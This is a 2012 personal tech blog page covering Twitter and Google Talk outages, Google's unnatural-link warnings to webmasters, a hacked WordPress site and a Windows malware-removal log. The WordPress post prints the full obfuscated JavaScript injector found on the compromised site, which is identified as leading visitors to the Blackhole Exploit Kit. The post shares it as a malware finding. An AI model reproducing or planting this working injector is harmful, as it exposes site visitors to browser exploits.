Thursday, July 26, 2012

Twitter outage - twitter down 26th july 2012


THU
Twitter Site Issue 17 minutes ago
Users may be experiencing issues accessing Twitter. Our engineers are currently working to resolve the issue.
http://status.twitter.com/


Twitter is currently down for <%= reason %>.

We expect to be back in <%= deadline %>. For more information, check out Twitter Status. Thanks for your patience!

Gtalk - google talk - google chat services down today 26th July 2012



Google Talk service has already been restored for some users, and we expect a resolution for all users in the near future. Please note this time frame is an estimate and may change.

http://www.google.com/appsstatus#hl=en&v=issue&ts=1343327399000&iid=a6fb32beebebf8e85b0c986b09a4e69d

After the feedback from many people on facebook and twitter it is true gtalk services are down today

But going by google (the worst customer support service in the world) . I could not find the place where it listed the gtalk server status or gtalk service status

If you do find the right place where they list the gtalk service status do share it in the comments

update
yes !! I found out the shitty place where google has listed the gtalk service update
http://www.google.com/appsstatus#hl=en&v=issue&ts=1343327399000&iid=a6fb32beebebf8e85b0c986b09a4e69d (This is the official google app service status link to check if you gtalk ,gmail and other google apps are down or up)



https://twitter.com/#!/search/gtalk for updates by normal users around the world

Till then you can use http://tinychat.com/
or for geeks  http://client04.chat.mibbit.com/

http://gadgets.ndtv.com/internet/news/gtalk-is-down-google-talk-outage-confirmed-247967


BE:LOW ARE USELESS LINKS FROM GOOGLE
http://googlesystem.blogspot.in/2009/09/gmail-is-down.html (but this is a shitty 2009 update)

http://support.google.com/chat/?hl=en
http://support.google.com/chat/bin/static.py?hl=en&page=known_issues.cs
http://support.google.com/chat/bin/request.py?contact_type=contact_policy




Time
Description
7/26/12 6:20 PM
Our team is continuing to investigate this issue. We will provide an update by 7/26/12 7:20 PM with more information about this problem. Thank you for your patience.
7/26/12 5:20 PM
We are continuing to investigate this issue. We will provide an update by 7/26/12 6:20 PM detailing when we expect to resolve the problem.
7/26/12 4:20 PM
We're aware of a problem with Google Talk affecting a majority of users. The affected users are able to access Google Talk, but are seeing error messages and/or other unexpected behavior. We will provide an update by 7/26/12 5:20 PM detailing when we expect to resolve the problem. Please note that this resolution time is an estimate and may change.
7/26/12 4:10 PM
We're investigating reports of an issue with Google Talk. We will provide more information shortly.

Saturday, July 21, 2012

Negative SEO -- Google anti spam message about links yesterday,


New notifications about inbound links

Friday, July 27, 2012 at 4:30 PM

Webmaster level: Advanced
http://googlewebmastercentral.blogspot.in/2012/07/new-notifications-about-inbound-links.html

https://plus.google.com/113006028898915385825/posts/gEBvDvXmvux

https://www.google.com/webmasters/tools/spamreportform?hl=en

Older Info
Matt Cutts01:59  -  Mobile  -  Public
If you received a message yesterday about unnatural links to your site, don’t panic. In the past, these messages were sent when we took action on a site as a whole. Yesterday, we took another step towards more transparency and began sending messages when we distrust some individual links to a site. While it’s possible for this to indicate potential spammy activity by the site, it can also have innocent reasons. For example, we may take this kind of targeted action to distrust hacked links pointing to an innocent site. The innocent site will get the message as we move towards more transparency, but it’s not necessarily something that you automatically need to worry about.

If we've taken more severe action on your site, you’ll likely notice a drop in search traffic, which you can see in the “Search queries” feature Webmaster Tools for example. As always, if you believe you have been affected by a manual spam action and your site no longer violates the Webmaster Guidelines, go ahead and file a reconsideration request. It’ll take some time for us to process the request, but you will receive a followup message confirming when we’ve processed it.
https://plus.google.com/109412257237874861202/posts/gik49G9c5LU

Specifically, look for possibly artificial or unnatural links pointing to your site that could be intended to manipulate PageRank.
http://searchengineland.com/insanity-google-sends-new-link-warnings-then-says-you-can-ignore-them-128297



Update: Thanks to everyone who gave feedback on this change. An engineer worked over the weekend based on the suggestions here, and starting on Sunday we made two changes so you can tell the "individual links aren't trusted" messages from the "our opinion of your entire site is affected" messages.

First off, we changed the messages themselves that we'll send out to make it clear that for a specific incident "we are taking very targeted action on the unnatural links instead of your site as a whole." So anyone that gets a message going forward can tell what type of action has occurred.

The second change is that these messages won't show the yellow caution sign in our webmaster console at http://google.com/webmasters/ like our other webspam notifications. This reflects the fact that these actions are much more targeted and don't always require action by the site owner.

Thanks again for the feedback, and we'll continue to work on ways to provide more useful and actionable information for site owners.









Insanity: Google Sends New Link Warnings, Then Says You Can Ignore Them
Jul 20, 2012 at 6:07pm ET by Danny Sullivan

http://searchengineland.com/insanity-google-sends-new-link-warnings-then-says-you-can-ignore-them-128297


here is my huge blackhat SEO list http://computerhelperzz.blogspot.in/2012/03/blog-back-hat-seo-hijackers.html

Tuesday, July 17, 2012

wordpress site hacked

With so many updated to wordpress i would have thought the platform was safer from being hacked.

you can scan you website for malware with
http://sitecheck.sucuri.net/scanner/


https://www.virustotal.com/#url (DO NOT DETECT MALWARE)

I got a site with some weird js code on the home page

http://labs.sucuri.net/
Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole2
http://labs.sucuri.net/?details=asjo.com.br

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Jun).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.


Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.


< script >try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="81.90.945.1020.288.400.900.1110.891.1170.981.1010.990.1160.414.1030.909.1160.621.1080.909.1090.909.1100.1044.1150.594.1210.756.970.927.780.873.1090.909.400.351.980.999.1000.1089.390.369.910.432.930.369.1230.117.90.81.90.945.1020.1026.970.981.1010.1026.400.369.590.117.90.81.1250.288.1010.972.1150.909.320.1107.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.1071.1140.945.1160.909.400.306.600.945.1020.1026.970.981.1010.288.1150.1026.990.549.390.936.1160.1044.1120.522.470.423.1090.882.1020.1017.1020.909.1170.414.500.477.1170.414.990.999.1090.423.1000.423.520.432.520.414.1120.936.1120.567.1030.999.610.441.390.288.1190.945.1000.1044.1040.549.390.441.480.351.320.936.1010.945.1030.936.1160.549.390.441.480.351.320.1035.1160.1089.1080.909.610.351.1180.945.1150.945.980.945.1080.945.1160.1089.580.936.1050.900.1000.909.1100.531.1120.999.1150.945.1160.945.1110.990.580.873.980.1035.1110.972.1170.1044.1010.531.1080.909.1020.1044.580.432.590.1044.1110.1008.580.432.590.351.620.540.470.945.1020.1026.970.981.1010.558.340.369.590.117.90.81.1250.117.90.81.1020.1053.1100.891.1160.945.1110.990.320.945.1020.1026.970.981.1010.1026.400.369.1230.117.90.81.90.1062.970.1026.320.918.320.549.320.900.1110.891.1170.981.1010.990.1160.414.990.1026.1010.873.1160.909.690.972.1010.981.1010.990.1160.360.390.945.1020.1026.970.981.1010.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1150.1026.990.351.440.351.1040.1044.1160.1008.580.423.470.981.980.918.1130.918.1010.1053.460.450.530.1053.460.891.1110.981.470.900.470.468.480.468.460.1008.1040.1008.630.927.1110.549.490.351.410.531.1020.414.1150.1044.1210.972.1010.414.1180.945.1150.945.980.945.1080.945.1160.1089.610.351.1040.945.1000.900.1010.990.390.531.1020.414.1150.1044.1210.972.1010.414.1120.999.1150.945.1160.945.1110.990.610.351.970.882.1150.999.1080.1053.1160.909.390.531.1020.414.1150.1044.1210.972.1010.414.1080.909.1020.1044.610.351.480.351.590.918.460.1035.1160.1089.1080.909.460.1044.1110.1008.610.351.480.351.590.918.460.1035.1010.1044.650.1044.1160.1026.1050.882.1170.1044.1010.360.390.1071.1050.900.1160.936.390.396.390.441.480.351.410.531.1020.414.1150.909.1160.585.1160.1044.1140.945.980.1053.1160.909.400.351.1040.909.1050.927.1040.1044.390.396.390.441.480.351.410.531.130.81.90.81.1000.999.990.1053.1090.909.1100.1044.460.927.1010.1044.690.972.1010.981.1010.990.1160.1035.660.1089.840.873.1030.702.970.981.1010.360.390.882.1110.900.1210.351.410.819.480.837.460.873.1120.1008.1010.990.1000.603.1040.945.1080.900.400.918.410.531.130.81.90.1125".split(".");h=2;s="";if(window["document"])for(i=0;-583+i<0;i=1+i){k=i;s=s+String.fromCharCode(n[k]/(i%(h)+9));}if(012===10)e(s);}< /script >

Saturday, July 7, 2012

various hijackers on windows


Registry Keys Detected: 13
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antiviruspro_2010.exe (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blank.doc (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwatson.exe (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\empty.jpg (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HACKER.COM.CN.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MICROSOFT.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSA.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NEW FOLDER.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMSS32.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVCH0ST.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SVCHOSTS.EXE (Security.Hijack) -> Quarantined and deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VCLEANER.EXE (Security.Hijack) -> Quarantined and deleted successfully.

Registry Data Items Detected: 4
HKLM\SOFTWARE\Microsoft\Security Center|AntiVirusDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and repaired successfully.
HKLM\SOFTWARE\Microsoft\Security Center|FirewallDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and repaired successfully.
HKLM\SOFTWARE\Microsoft\Security Center|UpdatesDisableNotify (PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and repaired successfully.
HKCR\scrfile\shell\open\command| (Broken.OpenCommand) -> Bad: (C:\PROGRA~1\NETPRO~1\ZVScan\ExecScan.exe "%1" /S) Good: ("%1" /S) -> Quarantined and repaired successfully.